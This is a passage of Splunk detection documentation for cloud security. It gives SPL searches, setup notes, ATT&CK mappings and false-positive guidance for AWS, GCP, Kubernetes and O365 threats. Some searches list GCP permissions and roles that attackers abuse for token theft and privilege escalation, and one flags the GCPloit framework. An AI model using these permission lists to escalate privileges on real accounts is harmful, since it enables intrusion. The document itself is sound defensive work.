| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | table firstTime lastTime user City | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats earliest(firstTime) AS earliestseen by user City | fields earliestseen user City] | eval userCity=if(firstTime >= relative_time(now(), "-24h@h"), "New City","Previously Seen City") | eval userStatus=if(earliestseen >= relative_time(now(), "-24h@h") OR isnull(earliestseen), "New User","Old User") | where userCity = "New City" AND userStatus != "Old User" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user City userStatus userCity | `detect_aws_console_login_by_user_from_new_city_filter`

Associated Analytic Story


How To Implement

You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_city_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset


version: 1


Detect aws console login by user from new country

This search looks for CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK: T1535
  • Last Updated: 2020-10-07

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | table firstTime lastTime user Country | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats earliest(firstTime) AS earliestseen by user Country | fields earliestseen user Country] | eval userCountry=if(firstTime >= relative_time(now(), "-24h@h"), "New Country","Previously Seen Country") | eval userStatus=if(earliestseen >= relative_time(now(),"-24h@h") OR isnull(earliestseen), "New User","Old User") | where userCountry = "New Country" AND userStatus != "Old User" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user Country userStatus userCountry | `detect_aws_console_login_by_user_from_new_country_filter`

Associated Analytic Story


How To Implement

You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_country_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset


version: 1


Detect aws console login by user from new region

This search looks for CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK: T1535
  • Last Updated: 2020-10-07

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | table firstTime lastTime user Region | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats earliest(firstTime) AS earliestseen by user Region | fields earliestseen user Region] | eval userRegion=if(firstTime >= relative_time(now(), "-24h@h"), "New Region","Previously Seen Region") | eval userStatus=if(earliestseen >= relative_time(now(), "-24h@h") OR isnull(earliestseen), "New User","Old User") | where userRegion = "New Region" AND userStatus != "Old User" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user Region userStatus userRegion | `detect_aws_console_login_by_user_from_new_region_filter`

Associated Analytic Story


How To Implement

You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_region_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset


version: 1


Detect gcp storage access from a new ip

This search looks at GCP Storage bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed a GCP Storage bucket.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2020-08-10

Search

`google_gcp_pubsub_message` | multikv | rename sc_status_ as status | rename cs_object_ as bucket_name | rename c_ip_ as remote_ip | rename cs_uri_ as request_uri | rename cs_method_ as operation | search status="\"200\"" | stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip operation request_uri | table firstTime, lastTime, bucket_name, remote_ip, operation, request_uri | inputlookup append=t previously_seen_gcp_storage_access_from_remote_ip.csv | stats min(firstTime) as firstTime, max(lastTime) as lastTime by bucket_name remote_ip operation request_uri | outputlookup previously_seen_gcp_storage_access_from_remote_ip.csv | eval newIP=if(firstTime >= relative_time(now(),"-70m@m"), 1, 0) | where newIP=1 | eval first_time=strftime(firstTime,"%m/%d/%y %H:%M:%S") | eval last_time=strftime(lastTime,"%m/%d/%y %H:%M:%S") | table first_time last_time bucket_name remote_ip operation request_uri | `detect_gcp_storage_access_from_a_new_ip_filter`

Associated Analytic Story


How To Implement

This search relies on the Splunk Add-on for Google Cloud Platform, setting up a Cloud Pub/Sub input, along with the relevant GCP PubSub topics and logging sink to capture GCP Storage Bucket events (https://cloud.google.com/logging/docs/routing/overview). In order to capture public GCP Storage Bucket access logs, you must also enable storage bucket logging to your PubSub Topic as per https://cloud.google.com/storage/docs/access-logs. These logs are deposited into the nominated Storage Bucket on an hourly basis and typically show up by 15 minutes past the hour. It is recommended to configure any saved searches or correlation searches in Enterprise Security to run on an hourly basis at 30 minutes past the hour (cron definition of 30 * * * *). A lookup table (previously_seen_gcp_storage_access_from_remote_ip.csv) stores the previously seen access requests, and is used by this search to determine any newly seen IP addresses accessing the Storage Buckets.

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

GCP Storage buckets can be accessed from any IP (if the ACLs are open to allow it), as long as it can make a successful connection. This will be a false postive, since the search is looking for a new IP within the past two hours.

Reference

Test Dataset

version: 1


Detect new open gcp storage buckets

This search looks for GCP PubSub events where a user has created an open/public GCP Storage bucket.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2020-08-05

Search

`google_gcp_pubsub_message` data.resource.type=gcs_bucket data.protoPayload.methodName=storage.setIamPermissions | spath output=action path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.action | spath output=user path=data.protoPayload.authenticationInfo.principalEmail | spath output=location path=data.protoPayload.resourceLocation.currentLocations{} | spath output=src path=data.protoPayload.requestMetadata.callerIp | spath output=bucketName path=data.protoPayload.resourceName | spath output=role path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.role | spath output=member path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.member | search (member=allUsers AND action=ADD) | table _time, bucketName, src, user, location, action, role, member | search `detect_new_open_gcp_storage_buckets_filter`

Associated Analytic Story


How To Implement

This search relies on the Splunk Add-on for Google Cloud Platform, setting up a Cloud Pub/Sub input, along with the relevant GCP PubSub topics and logging sink to capture GCP Storage Bucket events (https://cloud.google.com/logging/docs/routing/overview).

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

While this search has no known false positives, it is possible that a GCP admin has legitimately created a public bucket for a specific purpose. That said, GCP strongly advises against granting full control to the "allUsers" group.

Reference

Test Dataset

version: 1


Detect new open s3 buckets over aws cli

This search looks for CloudTrail events where a user has created an open/public S3 bucket over the aws cli.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2021-01-12

Search

`cloudtrail` eventSource="s3.amazonaws.com" eventName=PutBucketAcl OR requestParameters.accessControlList.x-amz-grant-read-acp IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write-acp IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-full-control IN ("*AuthenticatedUsers","*AllUsers") | rename requestParameters.bucketName AS bucketName | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId userAgent bucketName requestParameters.accessControlList.x-amz-grant-read requestParameters.accessControlList.x-amz-grant-read-acp requestParameters.accessControlList.x-amz-grant-write requestParameters.accessControlList.x-amz-grant-write-acp requestParameters.accessControlList.x-amz-grant-full-control | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_open_s3_buckets_over_aws_cli_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

While this search has no known false positives, it is possible that an AWS admin has legitimately created a public bucket for a specific purpose. That said, AWS strongly advises against granting full control to the "All Users" group.

Reference

Test Dataset


version: 1


Detect new open s3 buckets

This search looks for CloudTrail events where a user has created an open/public S3 bucket.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2021-01-12

Search

`cloudtrail` eventSource=s3.amazonaws.com eventName=PutBucketAcl | rex field=_raw "(?<json_field>{.+})" | spath input=json_field output=grantees path=requestParameters.AccessControlPolicy.AccessControlList.Grant{} | search grantees=* | mvexpand grantees | spath input=grantees output=uri path=Grantee.URI | spath input=grantees output=permission path=Permission | search uri IN ("http://acs.amazonaws.com/groups/global/AllUsers","http://acs.amazonaws.com/groups/global/AuthenticatedUsers") | search permission IN ("READ","READ_ACP","WRITE","WRITE_ACP","FULL_CONTROL") | rename requestParameters.bucketName AS bucketName | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId userAgent uri permission bucketName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_open_s3_buckets_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk.

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

While this search has no known false positives, it is possible that an AWS admin has legitimately created a public bucket for a specific purpose. That said, AWS strongly advises against granting full control to the "All Users" group.

Reference

Test Dataset


version: 2


Detect s3 access from a new ip

This search looks at S3 bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed an S3 bucket.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2018-06-28

Search

`aws_s3_accesslogs` http_status=200 [search `aws_s3_accesslogs` http_status=200 | stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip | inputlookup append=t previously_seen_S3_access_from_remote_ip.csv | stats min(firstTime) as firstTime, max(lastTime) as lastTime by bucket_name remote_ip | outputlookup previously_seen_S3_access_from_remote_ip.csv | eval newIP=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newIP=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table bucket_name remote_ip] | iplocation remote_ip |rename remote_ip as src_ip | table _time bucket_name src_ip City Country operation request_uri | `detect_s3_access_from_a_new_ip_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your S3 access logs' inputs. This search works best when you run the "Previously Seen S3 Bucket Access by Remote IP" support search once to create a history of previously seen remote IPs and bucket names.

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

S3 buckets can be accessed from any IP, as long as it can make a successful connection. This will be a false postive, since the search is looking for a new IP within the past hour

Reference

Test Dataset

version: 1


Detect spike in aws security hub alerts for ec2 instance

This search looks for a spike in number of of AWS security Hub alerts for an EC2 instance in 4 hours intervals

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2021-01-26

Search

`aws_securityhub_finding` "Resources{}.Type"=AWSEC2Instance | bucket span=4h _time | stats count AS alerts values(Title) as Title values(Types{}) as Types values(vendor_account) as vendor_account values(vendor_region) as vendor_region values(severity) as severity by _time dest | eventstats avg(alerts) as total_alerts_avg, stdev(alerts) as total_alerts_stdev | eval threshold_value = 3 | eval isOutlier=if(alerts > total_alerts_avg+(total_alerts_stdev * threshold_value), 1, 0) | search isOutlier=1 | table _time dest alerts Title Types vendor_account vendor_region severity isOutlier total_alerts_avg | `detect_spike_in_aws_security_hub_alerts_for_ec2_instance_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your Security Hub inputs. The threshold_value should be tuned to your environment and schedule these searches according to the bucket span interval.

Required field

Kill Chain Phase

Known False Positives

None

Reference

Test Dataset


version: 3


Detect spike in aws security hub alerts for user

This search looks for a spike in number of of AWS security Hub alerts for an AWS IAM User in 4 hours intervals.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2021-01-26

Search

`aws_securityhub_finding` "findings{}.Resources{}.Type"= AwsIamUser | rename findings{}.Resources{}.Id as user | bucket span=4h _time | stats count AS alerts by _time user | eventstats avg(alerts) as total_launched_avg, stdev(alerts) as total_launched_stdev | eval threshold_value = 2 | eval isOutlier=if(alerts > total_launched_avg+(total_launched_stdev * threshold_value), 1, 0) | search isOutlier=1 | table _time user alerts |`detect_spike_in_aws_security_hub_alerts_for_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your Security Hub inputs. The threshold_value should be tuned to your environment and schedule these searches according to the bucket span interval.

Required field

Kill Chain Phase

Known False Positives

None

Reference

Test Dataset

version: 3


Detect spike in s3 bucket deletion

This search detects users creating spikes in API activity related to deletion of S3 buckets in your AWS environment. It will also update the cache file that factors in the latest data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2018-11-27

Search

`cloudtrail` eventName=DeleteBucket [search `cloudtrail` eventName=DeleteBucket | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup s3_deletion_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup s3_deletion_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | spath output=bucketName path=requestParameters.bucketName | stats values(bucketName) as bucketName, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_s3_bucket_deletion_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of S3 Bucket deletion activity by ARN" support search once to create a baseline of previously seen S3 bucket-deletion activity.

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Based on the values of`dataPointThreshold` and `deviationThreshold`, the false positive rate may vary. Please modify this according the your environment.

Reference

Test Dataset

version: 1


Detect spike in blocked outbound traffic from your aws

This search will detect spike in blocked outbound network connections originating from within your AWS environment. It will also update the cache file that factors in the latest data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-05-07

Search

`cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) [search `cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) | stats count as numberOfBlockedConnections by src_ip | inputlookup baseline_blocked_outbound_connections append=t | fields - latestCount | stats values(*) as * by src_ip | rename numberOfBlockedConnections as latestCount | eval newAvgBlockedConnections=avgBlockedConnections + (latestCount-avgBlockedConnections)/720 | eval newStdevBlockedConnections=sqrt(((pow(stdevBlockedConnections, 2)*719 + (latestCount-newAvgBlockedConnections)*(latestCount-avgBlockedConnections))/720)) | eval avgBlockedConnections=coalesce(newAvgBlockedConnections, avgBlockedConnections), stdevBlockedConnections=coalesce(newStdevBlockedConnections, stdevBlockedConnections), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table src_ip, latestCount, numDataPoints, avgBlockedConnections, stdevBlockedConnections | outputlookup baseline_blocked_outbound_connections | eval dataPointThreshold = 5, deviationThreshold = 3 | eval isSpike=if((latestCount > avgBlockedConnections+deviationThreshold*stdevBlockedConnections) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | table src_ip] | stats values(dest_ip) as "Blocked Destination IPs", values(interface_id) as "resourceId" count as numberOfBlockedConnections, dc(dest_ip) as uniqueDestConnections by src_ip | `detect_spike_in_blocked_outbound_traffic_from_your_aws_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your VPC Flow logs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the number of data points required to meet the definition of "spike." The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Blocked Outbound Connection" support search once to create a history of previously seen blocked outbound connections.

Required field

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Known False Positives

The false-positive rate may vary based on the values of`dataPointThreshold` and `deviationThreshold`. Additionally, false positives may result when AWS administrators roll out policies enforcing network blocks, causing sudden increases in the number of blocked outbound connections.

Reference

Test Dataset

version: 1


Gcp detect accounts with high risk roles by project

This search provides detection of accounts with high risk roles by projects. Compromised accounts with high risk roles can move laterally or even scalate privileges at different projects depending on organization schema.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-10-09

Search

`google_gcp_pubsub_message` data.protoPayload.request.policy.bindings{}.role=roles/owner OR roles/editor OR roles/iam.serviceAccountUser OR roles/iam.serviceAccountAdmin OR roles/iam.serviceAccountTokenCreator OR roles/dataflow.developer OR roles/dataflow.admin OR roles/composer.admin OR roles/dataproc.admin OR roles/dataproc.editor | table data.resource.type data.protoPayload.authenticationInfo.principalEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.authorizationInfo{}.resource data.protoPayload.response.bindings{}.role data.protoPayload.response.bindings{}.members{} | `gcp_detect_accounts_with_high_risk_roles_by_project_filter`

Associated Analytic Story


How To Implement

You must install splunk GCP add-on. This search works with gcp:pubsub:message logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

Accounts with high risk roles should be reduced to the minimum number needed, however specific tasks and setups may be simply expected behavior within organization

Reference


Test Dataset

version: 1


Gcp detect gcploit framework

This search provides detection of GCPloit exploitation framework. This framework can be used to escalate privileges and move laterally from compromised high privilege accounts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-10-08

Search

`google_gcp_pubsub_message` data.protoPayload.request.function.timeout=539s | table src src_user data.resource.labels.project_id data.protoPayload.request.function.serviceAccountEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.request.location http_user_agent | `gcp_detect_gcploit_framework_filter`

Associated Analytic Story


How To Implement

You must install splunk GCP add-on. This search works with gcp:pubsub:message logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

Payload.request.function.timeout value can possibly be match with other functions or requests however the source user and target request account may indicate an attempt to move laterally accross acounts or projects

Reference


Test Dataset

version: 1


Gcp detect high risk permissions by resource and account

This search provides detection of high risk permissions by resource and accounts. These are permissions that can allow attackers with compromised accounts to move laterally and escalate privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-10-09

Search

`google_gcp_pubsub_message` data.protoPayload.authorizationInfo{}.permission=iam.serviceAccounts.getaccesstoken OR iam.serviceAccounts.setIamPolicy OR iam.serviceAccounts.actas OR dataflow.jobs.create OR composer.environments.create OR dataproc.clusters.create |table data.protoPayload.requestMetadata.callerIp data.protoPayload.authenticationInfo.principalEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.response.bindings{}.members{} data.resource.labels.project_id | `gcp_detect_high_risk_permissions_by_resource_and_account_filter`

Associated Analytic Story


How To Implement

You must install splunk GCP add-on. This search works with gcp:pubsub:message logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

High risk permissions are part of any GCP environment, however it is important to track resource and accounts usage, this search may produce false positives.

Reference


Test Dataset

version: 1


Gcp kubernetes cluster pod scan detection

This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster's pods

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-07-17

Search

`google_gcp_pubsub_message` category=kube-audit |spath input=properties.log |search responseStatus.code=401 |table sourceIPs{} userAgent verb requestURI responseStatus.reason properties.pod | `gcp_kubernetes_cluster_pod_scan_detection_filter`

Associated Analytic Story


How To Implement

You must install the GCP App for Splunk (version 2.0.0 or later), then configure stackdriver and set a Pub/Sub subscription to be imported to Splunk.

Required field

ATT&CK

ID Technique Tactic
T1526 Cloud Service Discovery Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but frequency, User Agent, source IPs and pods will provide context.

Reference

Test Dataset

version: 1


Gcp kubernetes cluster scan detection

This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-04-15

Search

`google_gcp_pubsub_message` data.protoPayload.requestMetadata.callerIp!=127.0.0.1 data.protoPayload.requestMetadata.callerIp!=::1 "data.labels.authorization.k8s.io/decision"=forbid "data.protoPayload.status.message"=PERMISSION_DENIED data.protoPayload.authenticationInfo.principalEmail="system:anonymous" | rename data.protoPayload.requestMetadata.callerIp as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(data.protoPayload.methodName) as method_name values(data.protoPayload.resourceName) as resource_name values(data.protoPayload.requestMetadata.callerSuppliedUserAgent) as http_user_agent by src_ip data.resource.labels.cluster_name | rename data.resource.labels.cluster_name as cluster_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `gcp_kubernetes_cluster_scan_detection_filter`

Associated Analytic Story


How To Implement

You must install the GCP App for Splunk (version 2.0.0 or later), then configure stackdriver and set a Pub/Sub subscription to be imported to Splunk. You must also install Cloud Infrastructure data model.Customize the macro kubernetes_gcp_scan_fingerprint_attack_detection to filter out FPs.

Required field

ATT&CK

ID Technique Tactic
T1526 Cloud Service Discovery Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but frequency, User Agent and source IPs will provide context.

Reference

Test Dataset

version: 1


High number of login failures from a single source

This search will detect more than 5 login failures in Office365 Azure Active Directory from a single source IP address. Please adjust the threshold value of 5 as suited for your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1110.001
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Operation=UserLoginFailed record_type=AzureActiveDirectoryStsLogon app=AzureActiveDirectory | stats count dc(user) as accounts_locked values(user) as user values(LogonError) as LogonError values(authentication_method) as authentication_method values(signature) as signature values(UserAgent) as UserAgent by src_ip record_type Operation app | search accounts_locked >= 5 | `high_number_of_login_failures_from_a_single_source_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1110.001 Password Guessing Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference

Test Dataset

version: 1


Kubernetes aws detect rbac authorization by account

This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding top to see both extremes of RBAC by accounts occurrences

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` annotations.authorization.k8s.io/reason=* | table sourceIPs{} user.username userAgent annotations.authorization.k8s.io/reason | stats count by user.username annotations.authorization.k8s.io/reason | rare user.username annotations.authorization.k8s.io/reason |`kubernetes_aws_detect_rbac_authorization_by_account_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all RBAC Authorications are malicious. RBAC authorizations can uncover malicious activity specially if sensitive Roles have been granted.

Reference

Test Dataset

version: 1


Kubernetes aws detect most active service accounts by pod

This search provides information on Kubernetes service accounts,accessing pods by IP address, verb and decision

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` user.groups{}=system:serviceaccounts objectRef.resource=pods | table sourceIPs{} user.username userAgent verb annotations.authorization.k8s.io/decision | top sourceIPs{} user.username verb annotations.authorization.k8s.io/decision |`kubernetes_aws_detect_most_active_service_accounts_by_pod_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all service accounts interactions are malicious. Analyst must consider IP, verb and decision context when trying to detect maliciousness.

Reference

Test Dataset

version: 1


Kubernetes aws detect sensitive role access

This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` objectRef.resource=clusterroles OR clusterrolebindings sourceIPs{}!=::1 sourceIPs{}!=127.0.0.1 | table sourceIPs{} user.username user.groups{} objectRef.namespace requestURI annotations.authorization.k8s.io/reason | dedup user.username user.groups{} |`kubernetes_aws_detect_sensitive_role_access_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive role resource access is necessary for cluster operation, however source IP, namespace and user group may indicate possible malicious use.

Reference

Test Dataset

version: 1


Kubernetes aws detect service accounts forbidden failure access

This search provides information on Kubernetes service accounts with failure or forbidden access status, this search can be extended by using top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

